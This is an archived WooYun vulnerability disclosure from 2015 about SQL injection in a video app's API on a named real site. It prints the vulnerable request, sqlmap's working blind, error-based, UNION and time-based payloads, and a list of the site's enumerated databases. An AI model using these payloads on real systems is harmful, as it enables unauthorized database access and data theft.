乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-21: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经主动忽略漏洞,细节向公众公开
*
光息谷 为云视旗下APP查看视频处存在SQL注入抓包
POST /e/extend/new_client_api/column_detail.php HTTP/1.1Host: www.hktv.tvProxy-Connection: keep-aliveAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 51Connection: keep-aliveUser-Agent: ?????ˉè°· 2.9 (iPhone; iPhone OS 8.3; zh_CN)channel_itemid=84&page=0&pagecount=12&channelid=0
证明:
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:---Place: POSTParameter: channel_itemid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: channel_itemid=84 AND 7132=7132&page=0&pagecount=12&channelid=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: channel_itemid=84 AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x3a7a697a3a,(SELECT (CASE WHEN (4549=4549) THEN 1 ELSE 0 END)),0x3a6f78703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page=0&pagecount=12&channelid=0 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: channel_itemid=84 UNION ALL SELECT NULL,CONCAT(0x3a7a697a3a,0x6c654d694475534c4c4d,0x3a6f78703a),NULL,NULL,NULL,NULL,NULL#&page=0&pagecount=12&channelid=0 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: channel_itemid=84 AND SLEEP(5)&page=0&pagecount=12&channelid=0---[12:52:27] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.23back-end DBMS: MySQL 5.0[12:52:27] [INFO] fetched data logged to text files under 'D:\sqlmap\output\www.hktv.tv'[*] shutting down at 12:52:27
数据库:
available databases [24]:[*] bbs_hktv[*] cdp[*] cms_as[*] cms_hktv[*] information_schema[*] jsbc-security[*] meicam[*] mysql[*] odp[*] onairfastedit[*] onairtranscode[*] ors[*] performance_schema[*] security_as[*] security_hktv[*] security_hn[*] vms[*] vms_as[*] vms_hktv[*] vms_jyg[*] vms_sjs[*] wechat_hn[*] wechat_sjs[*] yicloud_aliyun_rds_dummy_database
RT
危害等级:无影响厂商忽略
忽略时间:2015-05-26 15:38
漏洞Rank:4 (WooYun评价)
暂无